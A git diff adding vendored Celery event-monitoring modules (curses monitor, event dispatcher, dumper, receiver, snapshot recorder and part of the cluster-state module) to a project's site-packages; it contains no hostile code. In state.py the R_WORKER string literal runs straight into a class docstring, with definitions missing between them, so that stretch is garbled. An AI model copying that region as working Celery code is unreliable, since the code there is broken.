3, + abbr(' ' * 4 + subline, self.screen_width - 4), + curses.A_NORMAL, + ) + + return self.alert( + alert_callback, f'Task details for {self.selected_task}', + ) + + def selection_traceback(self): + if not self.selected_task: + return curses.beep() + task = self.state.tasks[self.selected_task] + if task.state not in states.EXCEPTION_STATES: + return curses.beep() + + def alert_callback(my, mx, xs): + y = count(xs) + for line in task.traceback.split('\n'): + self.win.addstr(next(y), 3, line) + + return self.alert( + alert_callback, + f'Task Exception Traceback for {self.selected_task}', + ) + + def selection_result(self): + if not self.selected_task: + return + + def alert_callback(my, mx, xs): + y = count(xs) + task = self.state.tasks[self.selected_task] + result = (getattr(task, 'result', None) or + getattr(task, 'exception', None)) + for line in wrap(result or '', mx - 2): + self.win.addstr(next(y), 3, line) + + return self.alert( + alert_callback, + f'Task Result for {self.selected_task}', + ) + + def display_task_row(self, lineno, task): + state_color = self.state_colors.get(task.state) + attr = curses.A_NORMAL + if task.uuid == self.selected_task: + attr = curses.A_STANDOUT + timestamp = datetime.utcfromtimestamp( + task.timestamp or time(), + ) + timef = timestamp.strftime('%H:%M:%S') + hostname = task.worker.hostname if task.worker else '*NONE*' + line = self.format_row(task.uuid, task.name, + hostname, + timef, task.state) + self.win.addstr(lineno, LEFT_BORDER_OFFSET, line, attr) + + if state_color: + self.win.addstr(lineno, + len(line) - STATE_WIDTH + BORDER_SPACING - 1, + task.state, state_color | attr) + + def draw(self): + with self.lock: + win = self.win + self.handle_keypress() + x = LEFT_BORDER_OFFSET + y = blank_line = count(2) + my, _ = win.getmaxyx() + win.erase() + win.bkgd(' ', curses.color_pair(1)) + win.border() + win.addstr(1, x, self.greet, curses.A_DIM | curses.color_pair(5)) + next(blank_line) + win.addstr(next(y), x, self.format_row('UUID', 'TASK', + 'WORKER', 'TIME', 'STATE'), + curses.A_BOLD | curses.A_UNDERLINE) + tasks = self.tasks + if tasks: + for row, (_, task) in enumerate(tasks): + if row > self.display_height: + break + + if task.uuid: + lineno = next(y) + self.display_task_row(lineno, task) + + # -- Footer + next(blank_line) + win.hline(my - 6, x, curses.ACS_HLINE, self.screen_width - 4) + + # Selected Task Info + if self.selected_task: + win.addstr(my - 5, x, self.selected_str, curses.A_BOLD) + info = 'Missing extended info' + detail = '' + try: + selection = self.state.tasks[self.selected_task] + except KeyError: + pass + else: + info = selection.info() + if 'runtime' in info: + info['runtime'] = '{:.2f}'.format(info['runtime']) + if 'result' in info: + info['result'] = abbr(info['result'], 16) + info = ' '.join( + f'{key}={value}' + for key, value in info.items() + ) + detail = '... -> key i' + infowin = abbr(info, + self.screen_width - len(self.selected_str) - 2, + detail) + win.addstr(my - 5, x + len(self.selected_str), infowin) + # Make ellipsis bold + if detail in infowin: + detailpos = len(infowin) - len(detail) + win.addstr(my - 5, x + len(self.selected_str) + detailpos, + detail, curses.A_BOLD) + else: + win.addstr(my - 5, x, 'No task selected', curses.A_NORMAL) + + # Workers + if self.workers: + win.addstr(my - 4, x, self.online_str, curses.A_BOLD) + win.addstr(my - 4, x + len(self.online_str), + ', '.join(sorted(self.workers)), curses.A_NORMAL) + else: + win.addstr(my - 4, x, 'No workers discovered.') + + # Info + win.addstr(my - 3, x, self.info_str, curses.A_BOLD) + win.addstr( + my - 3, x + len(self.info_str), + STATUS_SCREEN.format( + s=self.state, + w_alive=len([w for w in self.state.workers.values() + if w.alive]), + w_all=len(self.state.workers), + ), + curses.A_DIM, + ) + + # Help + self.safe_add_str(my - 2, x, self.help_title, curses.A_BOLD) + self.safe_add_str(my - 2, x + len(self.help_title), self.help, + curses.A_DIM) + win.refresh() + + def safe_add_str(self, y, x, string, *args, **kwargs): + if x + len(string) > self.screen_width: + string = string[:self.screen_width - x] + self.win.addstr(y, x, string, *args, **kwargs) + + def init_screen(self): + with self.lock: + self.win = curses.initscr() + self.win.nodelay(True) + self.win.keypad(True) + curses.start_color() + curses.init_pair(1, self.foreground, self.background) + # exception states + curses.init_pair(2, curses.COLOR_RED, self.background) + # successful state + curses.init_pair(3, curses.COLOR_GREEN, self.background) + # revoked state + curses.init_pair(4, curses.COLOR_MAGENTA, self.background) + # greeting + curses.init_pair(5, curses.COLOR_BLUE, self.background) + # started state + curses.init_pair(6, curses.COLOR_YELLOW, self.foreground) + + self.state_colors = {states.SUCCESS: curses.color_pair(3), + states.REVOKED: curses.color_pair(4), + states.STARTED: curses.color_pair(6)} + for state in states.EXCEPTION_STATES: + self.state_colors[state] = curses.color_pair(2) + + curses.cbreak() + + def resetscreen(self): + with self.lock: + curses.nocbreak() + self.win.keypad(False) + curses.echo() + curses.endwin() + + def nap(self): + curses.napms(self.screen_delay) + + @property + def tasks(self): + return list(self.state.tasks_by_time(limit=self.limit)) + + @property + def workers(self): + return [hostname for hostname, w in self.state.workers.items() + if w.alive] + + +class DisplayThread(threading.Thread): # pragma: no cover + + def __init__(self, display): + self.display = display + self.shutdown = False + super().__init__() + + def run(self): + while not self.shutdown: + self.display.draw() + self.display.nap() + + +def capture_events(app, state, display): # pragma: no cover + + def on_connection_error(exc, interval): + print('Connection Error: {!r}. Retry in {}s.'.format( + exc, interval), file=sys.stderr) + + while 1: + print('-> evtop: starting capture...', file=sys.stderr) + with app.connection_for_read() as conn: + try: + conn.ensure_connection(on_connection_error, + app.conf.broker_connection_max_retries) + recv = app.events.Receiver(conn, handlers={'*': state.event}) + display.resetscreen() + display.init_screen() + recv.capture() + except conn.connection_errors + conn.channel_errors as exc: + print(f'Connection lost: {exc!r}', file=sys.stderr) + + +def evtop(app=None): # pragma: no cover + """Start curses monitor.""" + app = app_or_default(app) + state = app.events.State() + display = CursesMonitor(state, app) + display.init_screen() + refresher = DisplayThread(display) + refresher.start() + try: + capture_events(app, state, display) + except Exception: + refresher.shutdown = True + refresher.join() + display.resetscreen() + raise + except (KeyboardInterrupt, SystemExit): + refresher.shutdown = True + refresher.join() + display.resetscreen() + + +if __name__ == '__main__': # pragma: no cover + evtop() diff --git a/env/Lib/site-packages/celery/events/dispatcher.py b/env/Lib/site-packages/celery/events/dispatcher.py new file mode 100644 index 00000000..1969fc21 --- /dev/null +++ b/env/Lib/site-packages/celery/events/dispatcher.py @@ -0,0 +1,229 @@ +"""Event dispatcher sends events.""" + +import os +import threading +import time +from collections import defaultdict, deque + +from kombu import Producer + +from celery.app import app_or_default +from celery.utils.nodenames import anon_nodename +from celery.utils.time import utcoffset + +from .event import Event, get_exchange, group_from + +__all__ = ('EventDispatcher',) + + +class EventDispatcher: + """Dispatches event messages. + + Arguments: + connection (kombu.Connection): Connection to the broker. + + hostname (str): Hostname to identify ourselves as, + by default uses the hostname returned by + :func:`~celery.utils.anon_nodename`. + + groups (Sequence[str]): List of groups to send events for. + :meth:`send` will ignore send requests to groups not in this list. + If this is :const:`None`, all events will be sent. + Example groups include ``"task"`` and ``"worker"``. + + enabled (bool): Set to :const:`False` to not actually publish any + events, making :meth:`send` a no-op. + + channel (kombu.Channel): Can be used instead of `connection` to specify + an exact channel to use when sending events. + + buffer_while_offline (bool): If enabled events will be buffered + while the connection is down. :meth:`flush` must be called + as soon as the connection is re-established. + + Note: + You need to :meth:`close` this after use. + """ + + DISABLED_TRANSPORTS = {'sql'} + + app = None + + # set of callbacks to be called when :meth:`enabled`. + on_enabled = None + + # set of callbacks to be called when :meth:`disabled`. + on_disabled = None + + def __init__(self, connection=None, hostname=None, enabled=True, + channel=None, buffer_while_offline=True, app=None, + serializer=None, groups=None, delivery_mode=1, + buffer_group=None, buffer_limit=24, on_send_buffered=None): + self.app = app_or_default(app or self.app) + self.connection = connection + self.channel = channel + self.hostname = hostname or anon_nodename() + self.buffer_while_offline = buffer_while_offline + self.buffer_group = buffer_group or frozenset() + self.buffer_limit = buffer_limit + self.on_send_buffered = on_send_buffered + self._group_buffer = defaultdict(list) + self.mutex = threading.Lock() + self.producer = None + self._outbound_buffer = deque() + self.serializer = serializer or self.app.conf.event_serializer + self.on_enabled = set() + self.on_disabled = set() + self.groups = set(groups or []) + self.tzoffset = [-time.timezone, -time.altzone] + self.clock = self.app.clock + self.delivery_mode = delivery_mode + if not connection and channel: + self.connection = channel.connection.client + self.enabled = enabled + conninfo = self.connection or self.app.connection_for_write() + self.exchange = get_exchange(conninfo, + name=self.app.conf.event_exchange) + if conninfo.transport.driver_type in self.DISABLED_TRANSPORTS: + self.enabled = False + if self.enabled: + self.enable() + self.headers = {'hostname': self.hostname} + self.pid = os.getpid() + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def enable(self): + self.producer = Producer(self.channel or self.connection, + exchange=self.exchange, + serializer=self.serializer, + auto_declare=False) + self.enabled = True + for callback in self.on_enabled: + callback() + + def disable(self): + if self.enabled: + self.enabled = False + self.close() + for callback in self.on_disabled: + callback() + + def publish(self, type, fields, producer, + blind=False, Event=Event, **kwargs): + """Publish event using custom :class:`~kombu.Producer`. + + Arguments: + type (str): Event type name, with group separated by dash (`-`). + fields: Dictionary of event fields, must be json serializable. + producer (kombu.Producer): Producer instance to use: + only the ``publish`` method will be called. + retry (bool): Retry in the event of connection failure. + retry_policy (Mapping): Map of custom retry policy options. + See :meth:`~kombu.Connection.ensure`. + blind (bool): Don't set logical clock value (also don't forward + the internal logical clock). + Event (Callable): Event type used to create event. + Defaults to :func:`Event`. + utcoffset (Callable): Function returning the current + utc offset in hours. + """ + clock = None if blind else self.clock.forward() + event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), + pid=self.pid, clock=clock, **fields) + with self.mutex: + return self._publish(event, producer, + routing_key=type.replace('-', '.'), **kwargs) + + def _publish(self, event, producer, routing_key, retry=False, + retry_policy=None, utcoffset=utcoffset): + exchange = self.exchange + try: + producer.publish( + event, + routing_key=routing_key, + exchange=exchange.name, + retry=retry, + retry_policy=retry_policy, + declare=[exchange], + serializer=self.serializer, + headers=self.headers, + delivery_mode=self.delivery_mode, + ) + except Exception as exc: # pylint: disable=broad-except + if not self.buffer_while_offline: + raise + self._outbound_buffer.append((event, routing_key, exc)) + + def send(self, type, blind=False, utcoffset=utcoffset, retry=False, + retry_policy=None, Event=Event, **fields): + """Send event. + + Arguments: + type (str): Event type name, with group separated by dash (`-`). + retry (bool): Retry in the event of connection failure. + retry_policy (Mapping): Map of custom retry policy options. + See :meth:`~kombu.Connection.ensure`. + blind (bool): Don't set logical clock value (also don't forward + the internal logical clock). + Event (Callable): Event type used to create event, + defaults to :func:`Event`. + utcoffset (Callable): unction returning the current utc offset + in hours. + **fields (Any): Event fields -- must be json serializable. + """ + if self.enabled: + groups, group = self.groups, group_from(type) + if groups and group not in groups: + return + if group in self.buffer_group: + clock = self.clock.forward() + event = Event(type, hostname=self.hostname, + utcoffset=utcoffset(), + pid=self.pid, clock=clock, **fields) + buf = self._group_buffer[group] + buf.append(event) + if len(buf) >= self.buffer_limit: + self.flush() + elif self.on_send_buffered: + self.on_send_buffered() + else: + return self.publish(type, fields, self.producer, blind=blind, + Event=Event, retry=retry, + retry_policy=retry_policy) + + def flush(self, errors=True, groups=True): + """Flush the outbound buffer.""" + if errors: + buf = list(self._outbound_buffer) + try: + with self.mutex: + for event, routing_key, _ in buf: + self._publish(event, self.producer, routing_key) + finally: + self._outbound_buffer.clear() + if groups: + with self.mutex: + for group, events in self._group_buffer.items(): + self._publish(events, self.producer, '%s.multi' % group) + events[:] = [] # list.clear + + def extend_buffer(self, other): + """Copy the outbound buffer of another instance.""" + self._outbound_buffer.extend(other._outbound_buffer) + + def close(self): + """Close the event dispatcher.""" + self.mutex.locked() and self.mutex.release() + self.producer = None + + def _get_publisher(self): + return self.producer + + def _set_publisher(self, producer): + self.producer = producer + publisher = property(_get_publisher, _set_publisher) # XXX compat diff --git a/env/Lib/site-packages/celery/events/dumper.py b/env/Lib/site-packages/celery/events/dumper.py new file mode 100644 index 00000000..24c7b3e9 --- /dev/null +++ b/env/Lib/site-packages/celery/events/dumper.py @@ -0,0 +1,103 @@ +"""Utility to dump events to screen. + +This is a simple program that dumps events to the console +as they happen. Think of it like a `tcpdump` for Celery events. +""" +import sys +from datetime import datetime + +from celery.app import app_or_default +from celery.utils.functional import LRUCache +from celery.utils.time import humanize_seconds + +__all__ = ('Dumper', 'evdump') + +TASK_NAMES = LRUCache(limit=0xFFF) + +HUMAN_TYPES = { + 'worker-offline': 'shutdown', + 'worker-online': 'started', + 'worker-heartbeat': 'heartbeat', +} + +CONNECTION_ERROR = """\ +-> Cannot connect to %s: %s. +Trying again %s +""" + + +def humanize_type(type): + try: + return HUMAN_TYPES[type.lower()] + except KeyError: + return type.lower().replace('-', ' ') + + +class Dumper: + """Monitor events.""" + + def __init__(self, out=sys.stdout): + self.out = out + + def say(self, msg): + print(msg, file=self.out) + # need to flush so that output can be piped. + try: + self.out.flush() + except AttributeError: # pragma: no cover + pass + + def on_event(self, ev): + timestamp = datetime.utcfromtimestamp(ev.pop('timestamp')) + type = ev.pop('type').lower() + hostname = ev.pop('hostname') + if type.startswith('task-'): + uuid = ev.pop('uuid') + if type in ('task-received', 'task-sent'): + task = TASK_NAMES[uuid] = '{}({}) args={} kwargs={}' \ + .format(ev.pop('name'), uuid, + ev.pop('args'), + ev.pop('kwargs')) + else: + task = TASK_NAMES.get(uuid, '') + return self.format_task_event(hostname, timestamp, + type, task, ev) + fields = ', '.join( + f'{key}={ev[key]}' for key in sorted(ev) + ) + sep = fields and ':' or '' + self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {fields}') + + def format_task_event(self, hostname, timestamp, type, task, event): + fields = ', '.join( + f'{key}={event[key]}' for key in sorted(event) + ) + sep = fields and ':' or '' + self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {task} {fields}') + + +def evdump(app=None, out=sys.stdout): + """Start event dump.""" + app = app_or_default(app) + dumper = Dumper(out=out) + dumper.say('-> evdump: starting capture...') + conn = app.connection_for_read().clone() + + def _error_handler(exc, interval): + dumper.say(CONNECTION_ERROR % ( + conn.as_uri(), exc, humanize_seconds(interval, 'in', ' ') + )) + + while 1: + try: + conn.ensure_connection(_error_handler) + recv = app.events.Receiver(conn, handlers={'*': dumper.on_event}) + recv.capture() + except (KeyboardInterrupt, SystemExit): + return conn and conn.close() + except conn.connection_errors + conn.channel_errors: + dumper.say('-> Connection lost, attempting reconnect') + + +if __name__ == '__main__': # pragma: no cover + evdump() diff --git a/env/Lib/site-packages/celery/events/event.py b/env/Lib/site-packages/celery/events/event.py new file mode 100644 index 00000000..a05ed707 --- /dev/null +++ b/env/Lib/site-packages/celery/events/event.py @@ -0,0 +1,63 @@ +"""Creating events, and event exchange definition.""" +import time +from copy import copy + +from kombu import Exchange + +__all__ = ( + 'Event', 'event_exchange', 'get_exchange', 'group_from', +) + +EVENT_EXCHANGE_NAME = 'celeryev' +#: Exchange used to send events on. +#: Note: Use :func:`get_exchange` instead, as the type of +#: exchange will vary depending on the broker connection. +event_exchange = Exchange(EVENT_EXCHANGE_NAME, type='topic') + + +def Event(type, _fields=None, __dict__=dict, __now__=time.time, **fields): + """Create an event. + + Notes: + An event is simply a dictionary: the only required field is ``type``. + A ``timestamp`` field will be set to the current time if not provided. + """ + event = __dict__(_fields, **fields) if _fields else fields + if 'timestamp' not in event: + event.update(timestamp=__now__(), type=type) + else: + event['type'] = type + return event + + +def group_from(type): + """Get the group part of an event type name. + + Example: + >>> group_from('task-sent') + 'task' + + >>> group_from('custom-my-event') + 'custom' + """ + return type.split('-', 1)[0] + + +def get_exchange(conn, name=EVENT_EXCHANGE_NAME): + """Get exchange used for sending events. + + Arguments: + conn (kombu.Connection): Connection used for sending/receiving events. + name (str): Name of the exchange. Default is ``celeryev``. + + Note: + The event type changes if Redis is used as the transport + (from topic -> fanout). + """ + ex = copy(event_exchange) + if conn.transport.driver_type == 'redis': + # quick hack for Issue #436 + ex.type = 'fanout' + if name != ex.name: + ex.name = name + return ex diff --git a/env/Lib/site-packages/celery/events/receiver.py b/env/Lib/site-packages/celery/events/receiver.py new file mode 100644 index 00000000..14871073 --- /dev/null +++ b/env/Lib/site-packages/celery/events/receiver.py @@ -0,0 +1,135 @@ +"""Event receiver implementation.""" +import time +from operator import itemgetter + +from kombu import Queue +from kombu.connection import maybe_channel +from kombu.mixins import ConsumerMixin + +from celery import uuid +from celery.app import app_or_default +from celery.utils.time import adjust_timestamp + +from .event import get_exchange + +__all__ = ('EventReceiver',) + +CLIENT_CLOCK_SKEW = -1 + +_TZGETTER = itemgetter('utcoffset', 'timestamp') + + +class EventReceiver(ConsumerMixin): + """Capture events. + + Arguments: + connection (kombu.Connection): Connection to the broker. + handlers (Mapping[Callable]): Event handlers. + This is a map of event type names and their handlers. + The special handler `"*"` captures all events that don't have a + handler. + """ + + app = None + + def __init__(self, channel, handlers=None, routing_key='#', + node_id=None, app=None, queue_prefix=None, + accept=None, queue_ttl=None, queue_expires=None): + self.app = app_or_default(app or self.app) + self.channel = maybe_channel(channel) + self.handlers = {} if handlers is None else handlers + self.routing_key = routing_key + self.node_id = node_id or uuid() + self.queue_prefix = queue_prefix or self.app.conf.event_queue_prefix + self.exchange = get_exchange( + self.connection or self.app.connection_for_write(), + name=self.app.conf.event_exchange) + if queue_ttl is None: + queue_ttl = self.app.conf.event_queue_ttl + if queue_expires is None: + queue_expires = self.app.conf.event_queue_expires + self.queue = Queue( + '.'.join([self.queue_prefix, self.node_id]), + exchange=self.exchange, + routing_key=self.routing_key, + auto_delete=True, durable=False, + message_ttl=queue_ttl, + expires=queue_expires, + ) + self.clock = self.app.clock + self.adjust_clock = self.clock.adjust + self.forward_clock = self.clock.forward + if accept is None: + accept = {self.app.conf.event_serializer, 'json'} + self.accept = accept + + def process(self, type, event): + """Process event by dispatching to configured handler.""" + handler = self.handlers.get(type) or self.handlers.get('*') + handler and handler(event) + + def get_consumers(self, Consumer, channel): + return [Consumer(queues=[self.queue], + callbacks=[self._receive], no_ack=True, + accept=self.accept)] + + def on_consume_ready(self, connection, channel, consumers, + wakeup=True, **kwargs): + if wakeup: + self.wakeup_workers(channel=channel) + + def itercapture(self, limit=None, timeout=None, wakeup=True): + return self.consume(limit=limit, timeout=timeout, wakeup=wakeup) + + def capture(self, limit=None, timeout=None, wakeup=True): + """Open up a consumer capturing events. + + This has to run in the main process, and it will never stop + unless :attr:`EventDispatcher.should_stop` is set to True, or + forced via :exc:`KeyboardInterrupt` or :exc:`SystemExit`. + """ + for _ in self.consume(limit=limit, timeout=timeout, wakeup=wakeup): + pass + + def wakeup_workers(self, channel=None): + self.app.control.broadcast('heartbeat', + connection=self.connection, + channel=channel) + + def event_from_message(self, body, localize=True, + now=time.time, tzfields=_TZGETTER, + adjust_timestamp=adjust_timestamp, + CLIENT_CLOCK_SKEW=CLIENT_CLOCK_SKEW): + type = body['type'] + if type == 'task-sent': + # clients never sync so cannot use their clock value + _c = body['clock'] = (self.clock.value or 1) + CLIENT_CLOCK_SKEW + self.adjust_clock(_c) + else: + try: + clock = body['clock'] + except KeyError: + body['clock'] = self.forward_clock() + else: + self.adjust_clock(clock) + + if localize: + try: + offset, timestamp = tzfields(body) + except KeyError: + pass + else: + body['timestamp'] = adjust_timestamp(timestamp, offset) + body['local_received'] = now() + return type, body + + def _receive(self, body, message, list=list, isinstance=isinstance): + if isinstance(body, list): # celery 4.0+: List of events + process, from_message = self.process, self.event_from_message + [process(*from_message(event)) for event in body] + else: + self.process(*self.event_from_message(body)) + + @property + def connection(self): + return self.channel.connection.client if self.channel else None diff --git a/env/Lib/site-packages/celery/events/snapshot.py b/env/Lib/site-packages/celery/events/snapshot.py new file mode 100644 index 00000000..d4dd65b1 --- /dev/null +++ b/env/Lib/site-packages/celery/events/snapshot.py @@ -0,0 +1,111 @@ +"""Periodically store events in a database. + +Consuming the events as a stream isn't always suitable +so this module implements a system to take snapshots of the +state of a cluster at regular intervals. There's a full +implementation of this writing the snapshots to a database +in :mod:`djcelery.snapshots` in the `django-celery` distribution. +""" +from kombu.utils.limits import TokenBucket + +from celery import platforms +from celery.app import app_or_default +from celery.utils.dispatch import Signal +from celery.utils.imports import instantiate +from celery.utils.log import get_logger +from celery.utils.time import rate +from celery.utils.timer2 import Timer + +__all__ = ('Polaroid', 'evcam') + +logger = get_logger('celery.evcam') + + +class Polaroid: + """Record event snapshots.""" + + timer = None + shutter_signal = Signal(name='shutter_signal', providing_args={'state'}) + cleanup_signal = Signal(name='cleanup_signal') + clear_after = False + + _tref = None + _ctref = None + + def __init__(self, state, freq=1.0, maxrate=None, + cleanup_freq=3600.0, timer=None, app=None): + self.app = app_or_default(app) + self.state = state + self.freq = freq + self.cleanup_freq = cleanup_freq + self.timer = timer or self.timer or Timer() + self.logger = logger + self.maxrate = maxrate and TokenBucket(rate(maxrate)) + + def install(self): + self._tref = self.timer.call_repeatedly(self.freq, self.capture) + self._ctref = self.timer.call_repeatedly( + self.cleanup_freq, self.cleanup, + ) + + def on_shutter(self, state): + pass + + def on_cleanup(self): + pass + + def cleanup(self): + logger.debug('Cleanup: Running...') + self.cleanup_signal.send(sender=self.state) + self.on_cleanup() + + def shutter(self): + if self.maxrate is None or self.maxrate.can_consume(): + logger.debug('Shutter: %s', self.state) + self.shutter_signal.send(sender=self.state) + self.on_shutter(self.state) + + def capture(self): + self.state.freeze_while(self.shutter, clear_after=self.clear_after) + + def cancel(self): + if self._tref: + self._tref() # flush all received events. + self._tref.cancel() + if self._ctref: + self._ctref.cancel() + + def __enter__(self): + self.install() + return self + + def __exit__(self, *exc_info): + self.cancel() + + +def evcam(camera, freq=1.0, maxrate=None, loglevel=0, + logfile=None, pidfile=None, timer=None, app=None, + **kwargs): + """Start snapshot recorder.""" + app = app_or_default(app) + + if pidfile: + platforms.create_pidlock(pidfile) + + app.log.setup_logging_subsystem(loglevel, logfile) + + print(f'-> evcam: Taking snapshots with {camera} (every {freq} secs.)') + state = app.events.State() + cam = instantiate(camera, state, app=app, freq=freq, + maxrate=maxrate, timer=timer) + cam.install() + conn = app.connection_for_read() + recv = app.events.Receiver(conn, handlers={'*': state.event}) + try: + try: + recv.capture(limit=None) + except KeyboardInterrupt: + raise SystemExit + finally: + cam.cancel() + conn.close() diff --git a/env/Lib/site-packages/celery/events/state.py b/env/Lib/site-packages/celery/events/state.py new file mode 100644 index 00000000..34499913 --- /dev/null +++ b/env/Lib/site-packages/celery/events/state.py @@ -0,0 +1,730 @@ +"""In-memory representation of cluster state. + +This module implements a data-structure used to keep +track of the state of a cluster of workers and the tasks +it is working on (by consuming events). + +For every event consumed the state is updated, +so the state represents the state of the cluster +at the time of the last event. + +Snapshots (:mod:`celery.events.snapshot`) can be used to +take "pictures" of this state at regular intervals +to for example, store that in a database. +""" +import bisect +import sys +import threading +from collections import defaultdict +from collections.abc import Callable +from datetime import datetime +from decimal import Decimal +from itertools import islice +from operator import itemgetter +from time import time +from typing import Mapping, Optional # noqa +from weakref import WeakSet, ref + +from kombu.clocks import timetuple +from kombu.utils.objects import cached_property + +from celery import states +from celery.utils.functional import LRUCache, memoize, pass1 +from celery.utils.log import get_logger + +__all__ = ('Worker', 'Task', 'State', 'heartbeat_expires') + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. +# pylint: disable=too-many-function-args +# For some reason pylint thinks ._event is a method, when it's a property. + +#: Set if running PyPy +PYPY = hasattr(sys, 'pypy_version_info') + +#: The window (in percentage) is added to the workers heartbeat +#: frequency. If the time between updates exceeds this window, +#: then the worker is considered to be offline. +HEARTBEAT_EXPIRE_WINDOW = 200 + +#: Max drift between event timestamp and time of event received +#: before we alert that clocks may be unsynchronized. +HEARTBEAT_DRIFT_MAX = 16 + +DRIFT_WARNING = ( + "Substantial drift from %s may mean clocks are out of sync. Current drift is " + "%s seconds. [orig: %s recv: %s]" +) + +logger = get_logger(__name__) +warn = logger.warning + +R_STATE = '' +R_WORKER = '>> add_tasks = state.tasks_by_type['proj.tasks.add'] + + while still supporting the method call:: + + >>> add_tasks = list(state.tasks_by_type( + ... 'proj.tasks.add', reverse=True)) + """ + + def __init__(self, fun, *args, **kwargs): + self.fun = fun + super().__init__(*args, **kwargs) + + def __call__(self, *args, **kwargs): + return self.fun(*args, **kwargs) + + +Callable.register(CallableDefaultdict) + + +@memoize(maxsize=1000, keyfun=lambda a, _: a[0]) +def _warn_drift(hostname, drift, local_received, timestamp): + # we use memoize here so the warning is only logged once per hostname + warn(DRIFT_WARNING, hostname, drift, + datetime.fromtimestamp(local_received), + datetime.fromtimestamp(timestamp)) + + +def heartbeat_expires(timestamp, freq=60, + expire_window=HEARTBEAT_EXPIRE_WINDOW, + Decimal=Decimal, float=float, isinstance=isinstance): + """Return time when heartbeat expires.""" + # some json implementations returns decimal.Decimal objects, + # which aren't compatible with float. + freq = float(freq) if isinstance(freq, Decimal) else freq + if isinstance(timestamp, Decimal): + timestamp = float(timestamp) + return timestamp + (freq * (expire_window / 1e2)) + + +def _depickle_task(cls, fields): + return cls(**fields) + + +def with_unique_field(attr): + + def _decorate_cls(cls): + + def __eq__(this, other): + if isinstance(other, this.__class__): + return getattr(this, attr) == getattr(other, attr) + return NotImplemented + cls.__eq__ = __eq__ + + def __hash__(this): + return hash(getattr(this, attr)) + cls.__hash__ = __hash__ + + return cls + return _decorate_cls + + +@with_unique_field('hostname') +class Worker: + """Worker State.""" + + heartbeat_max = 4 + expire_window = HEARTBEAT_EXPIRE_WINDOW + + _fields = ('hostname', 'pid', 'freq', 'heartbeats', 'clock', + 'active', 'processed', 'loadavg', 'sw_ident', + 'sw_ver', 'sw_sys') + if not PYPY: # pragma: no cover + __slots__ = _fields + ('event', '__dict__', '__weakref__') + + def __init__(self, hostname=None, pid=None, freq=60, + heartbeats=None, clock=0, active=None, processed=None, + loadavg=None, sw_ident=None, sw_ver=None, sw_sys=None): + self.hostname = hostname + self.pid = pid + self.freq = freq + self.heartbeats = [] if heartbeats is None else heartbeats + self.clock = clock or 0 + self.active = active + self.processed = processed + self.loadavg = loadavg + self.sw_ident = sw_ident + self.sw_ver = sw_ver + self.sw_sys = sw_sys + self.event = self._create_event_handler() + + def __reduce__(self): + return self.__class__, (self.hostname, self.pid, self.freq, + self.heartbeats, self.clock, self.active, + self.processed, self.loadavg, self.sw_ident, + self.sw_ver, self.sw_sys) + + def _create_event_handler(self): + _set = object.__setattr__ + hbmax = self.heartbeat_max + heartbeats = self.heartbeats + hb_pop = self.heartbeats.pop + hb_append = self.heartbeats.append + + def event(type_, timestamp=None, + local_received=None, fields=None, + max_drift=HEARTBEAT_DRIFT_MAX, abs=abs, int=int, + insort=bisect.insort, len=len): + fields = fields or {} + for k, v in fields.items(): + _set(self, k, v) + if type_ == 'offline': + heartbeats[:] = [] + else: + if not local_received or not timestamp: + return + drift = abs(int(local_received) - int(timestamp)) + if drift > max_drift: + _warn_drift(self.hostname, drift, + local_received, timestamp) + if local_received: # pragma: no cover + hearts = len(heartbeats) + if hearts > hbmax - 1: + hb_pop(0) + if hearts and local_received > heartbeats[-1]: + hb_append(local_received) + else: + insort(heartbeats, local_received) + return event + + def update(self, f, **kw): + d = dict(f, **kw) if kw else f + for k, v in d.items(): + setattr(self, k, v) + + def __repr__(self): + return R_WORKER.format(self) + + @property + def status_string(self): + return 'ONLINE' if self.alive else 'OFFLINE' + + @property + def heartbeat_expires(self): + return heartbeat_expires(self.heartbeats[-1], + self.freq, self.expire_window) + + @property + def alive(self, nowfun=time): + return bool(self.heartbeats and nowfun() < self.heartbeat_expires) + + @property + def id(self): + return '{0.hostname}.{0.pid}'.format(self) + + +@with_unique_field('uuid') +class Task: + """Task State.""" + + name = received = sent = started = succeeded = failed = retried = \ + revoked = rejected = args = kwargs = eta = expires = retries = \ + worker = result = exception = timestamp = runtime = traceback = \ + exchange = routing_key = root_id = parent_id = client = None + state = states.PENDING + clock = 0 + + _fields = ( + 'uuid', 'name', 'state', 'received', 'sent', 'started', 'rejected', + 'succeeded', 'failed', 'retried', 'revoked', 'args', 'kwargs', + 'eta', 'expires', 'retries', 'worker', 'result', 'exception', + 'timestamp', 'runtime', 'traceback', 'exchange', 'routing_key', + 'clock', 'client', 'root', 'root_id', 'parent', 'parent_id', + 'children', + ) + if not PYPY: # pragma: no cover + __slots__ = ('__dict__', '__weakref__') + + #: How to merge out of order events. + #: Disorder is detected by logical ordering (e.g., :event:`task-received` + #: must've happened before a :event:`task-failed` event). + #: + #: A merge rule consists of a state and a list of fields to keep from + #: that state. ``(RECEIVED, ('name', 'args')``, means the name and args + #: fields are always taken from the RECEIVED state, and any values for + #: these fields received before or after is simply ignored. + merge_rules = { + states.RECEIVED: ( + 'name', 'args', 'kwargs', 'parent_id', + 'root_id', 'retries', 'eta', 'expires', + ), + } + + #: meth:`info` displays these fields by default. + _info_fields = ( + 'args', 'kwargs', 'retries', 'result', 'eta', 'runtime', + 'expires', 'exception', 'exchange', 'routing_key', + 'root_id', 'parent_id', + ) + + def __init__(self, uuid=None, cluster_state=None, children=None, **kwargs): + self.uuid = uuid + self.cluster_state = cluster_state + if self.cluster_state is not None: + self.children = WeakSet( + self.cluster_state.tasks.get(task_id) + for task_id in children or () + if task_id in self.cluster_state.tasks + ) + else: + self.children = WeakSet() + self._serializer_handlers = { + 'children': self._serializable_children, + 'root': self._serializable_root, + 'parent': self._serializable_parent, + } + if kwargs: + self.__dict__.update(kwargs) + + def event(self, type_, timestamp=None, local_received=None, fields=None, + precedence=states.precedence, setattr=setattr, + task_event_to_state=TASK_EVENT_TO_STATE.get, RETRY=states.RETRY): + fields = fields or {} + + # using .get is faster than catching KeyError in this case. + state = task_event_to_state(type_) + if state is not None: + # sets, for example, self.succeeded to the timestamp. + setattr(self, type_, timestamp) + else: + state = type_.upper() # custom state + + # note that precedence here is reversed + # see implementation in celery.states.state.__lt__ + if state != RETRY and self.state != RETRY and \ + precedence(state) > precedence(self.state): 